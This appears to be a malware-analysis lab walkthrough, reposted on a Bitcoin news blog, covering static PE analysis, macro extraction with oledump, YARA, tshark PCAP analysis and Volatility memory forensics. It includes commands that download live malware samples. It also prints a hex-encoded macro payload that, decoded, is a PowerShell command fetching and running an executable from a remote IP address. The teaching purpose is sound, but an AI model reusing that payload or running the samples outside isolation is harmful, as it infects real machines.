Advanced Malware v3
############################
# Download the Analysis VM #
############################
https://ift.tt/2O2SFO2
user: infosecaddicts
pass: infosecaddicts
- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
- After logging please open a terminal window and type the following commands:
cd Desktop/
- This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
cd /home/infosecaddicts/Desktop/
wget https://ift.tt/2x5fzxZ --no-check-certificate
wget https://ift.tt/2MewK4O --no-check-certificate
unzip malware-password-is-infected.zip
infected
file malware.exe
mv malware.exe malware.pdf
file malware.pdf
mv malware.pdf malware.exe
hexdump -n 2 -C malware.exe
***What is '4d 5a' or 'MZ'***
Reference:
https://ift.tt/QVH11e
objdump -x malware.exe
strings malware.exe
strings --all malware.exe | head -n 6
strings malware.exe | grep -i dll
strings malware.exe | grep -i library
strings malware.exe | grep -i reg
strings malware.exe | grep -i hkey
strings malware.exe | grep -i hku
- We didn't see anything like HKLM, HKCU or other registry type stuff
strings malware.exe | grep -i irc
strings malware.exe | grep -i join
strings malware.exe | grep -i admin
strings malware.exe | grep -i list
- List of IRC commands: https://ift.tt/2oK9mAC
sudo apt-get install -y python-pefile
malware
vi analyse_malware.py
python analyse_malware.py malware.exe
Building a Malware Scanner
--------------------------
mkdir ~/Desktop/malwarescanner
cd ~/Desktop/malwarescanner
wget https://ift.tt/2wYyDxI
unzip master.zip
cd malwarescanner-master/
python scanner.py -h
cat strings.txt
cat hashes.txt
mkdir ~/Desktop/malcode
cp ~/Desktop/malware.exe ~/Desktop/malcode
python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
cd ~/Desktop/
#####################################################
# Analyzing Macro Embedded Malware #
# Reference: #
# https://ift.tt/2O0T4As #
#####################################################
cp ~/Desktop/
- Create a FREE account on:
https://ift.tt/2wZ1ulj
- Grab the malware from:
https://ift.tt/2O0T4QY
file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
sudo pip install olefile
malware
mkdir ~/Desktop/oledump
cd ~/Desktop/oledump
wget https://ift.tt/1S5bvSz
unzip oledump_V0_0_22.zip
cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
-----------------------------------------------------------------------------------------------------------------------------------
sudo pip install olefile
malware
mkdir ~/Desktop/oledump
cd ~/Desktop/oledump
wget https://ift.tt/2O0T6by
unzip 064016.zip
infected
python oledump.py 064016.doc
python oledump.py 064016.doc -s A4 -v
- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
python oledump.py 064016.doc -s A5 -v
- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
python oledump.py 064016.doc -s A3 -v
- Look for "GVhkjbjv" and you should see:
636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
- Take that long blob that starts with 636D and finishes with 653B and paste it in:
https://ift.tt/1rAwbqx
##############
# Yara Ninja #
##############
sudo apt-get remove -y yara
malware
wget https://ift.tt/2MdWrCs
sudo apt-get -y install libtool
malware
unzip v3.4.0.zip
cd yara-3.4.0
./bootstrap.sh
./configure
make
sudo make install
malware
yara -v
cd ..
wget https://ift.tt/2wWeKHF
unzip master.zip
cd ~/Desktop
yara rules-master/packer.yar malcode/malware.exe
Places to get more Yara rules:
------------------------------
https://ift.tt/2O61G8T
https://ift.tt/2wYlDrT
https://ift.tt/2O0T8QI
Yara rule sorting script:
-------------------------
https://ift.tt/2wVqIkQ
cd ~/Desktop/rules-master
for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
cd ~/Desktop/
yara rules-master/master.yar malcode/malware.exe
Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
https://ift.tt/2O0T9nK
Malware Repositories:
https://ift.tt/2wWLekL
https://ift.tt/1opEqxO
https://ift.tt/1jJIDvi
http://virusshare.com/
https://ift.tt/1HrR3Vm
###############################
# Creating a Malware Database #
###############################
Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
malware
wget https://ift.tt/2wVEVhk
wget wget https://ift.tt/2x5fzxZ
unzip malware-password-is-infected.zip
infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e
Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:
sudo apt-get install mysql-server
malware
- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:
sudo apt-get build-dep python-mysqldb
malware
sudo apt-get install python-mysqldb
malware
Step 3: Logging in
Run the following command in the terminal:
mysql -u root -p (set a password of 'malware')
- Then create one database by running following command:
create database malware;
exit;
wget https://ift.tt/2MewRgK
vi mal_to_db.py (fill in database connection information)
python mal_to_db.py -i
------- check it to see if the files table was created ------
mysql -u root -p
malware
show databases;
use malware;
show tables;
describe files;
exit;
---------------------------------
- Now add the malicious file to the DB
python mal_to_db.py -f malware.exe -u
- Now check to see if it is in the DB
mysql -u root -p
malware
mysql> use malware;
select id,md5,sha1,sha256,time FROM files;
mysql> quit;
#################
# PCAP Analysis #
#################
cd /home/infosecaddicts/Desktop/Browser\ Forensics
ls | grep pcap
perl chaosreader.pl suspicious-time.pcap
firefox index.html
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
malware
for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
#############################
# PCAP Analysis with tshark #
#############################
tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
tshark -r suspicious-time.pcap -qz ip_hosts,tree
tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
whois rapidshare.com.eyu32.ru
whois sploitme.com.cn
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
tshark -r suspicious-time.pcap -qz http_req,tree
tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
######################################
# PCAP Analysis with forensicPCAP.py #
######################################
cd ~/Desktop
wget https://ift.tt/2x0Hy1u
sudo easy_install cmd2
malware
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
ForPCAP >>> help
Prints stats about PCAP
ForPCAP >>> stat
Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
ForPCAP >>> dns
ForPCAP >>> show
Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
ForPCAP >>> dstports
ForPCAP >>> show
Prints the number of ip source and store them.
ForPCAP >>> ipsrc
ForPCAP >>> show
Prints the number of web's requests and store them
ForPCAP >>> web
ForPCAP >>> show
Prints the number of mail's requests and store them
ForPCAP >>> mail
ForPCAP >>> show
###################
# Memory Analysis #
###################
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf
cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget https://ift.tt/1MoKtDZ
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
cat malicious.js
*****Sorry - no time to cover javascript de-obfuscation today*****
cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
from BITCOIN NEWS https://ift.tt/2CCC81T
via Bitcoin News Update
Sunday, September 9, 2018
Advanced Malware v3
Date - September 09, 2018
Bitcoin News
Share this
Related Articles :
Paling Dilihat
-
from BITCOIN NEWS http://bit.ly/2BAgGb6 via Bitcoin News Update
-
This is a paid press release, which contains forward looking statements, and should be treated as advertising or promotional material. Bitco...
-
A Canadian online drug dealer, snared by an undercover police agent on the dark web, is pleading to be allowed to keep half of the 288 bitc...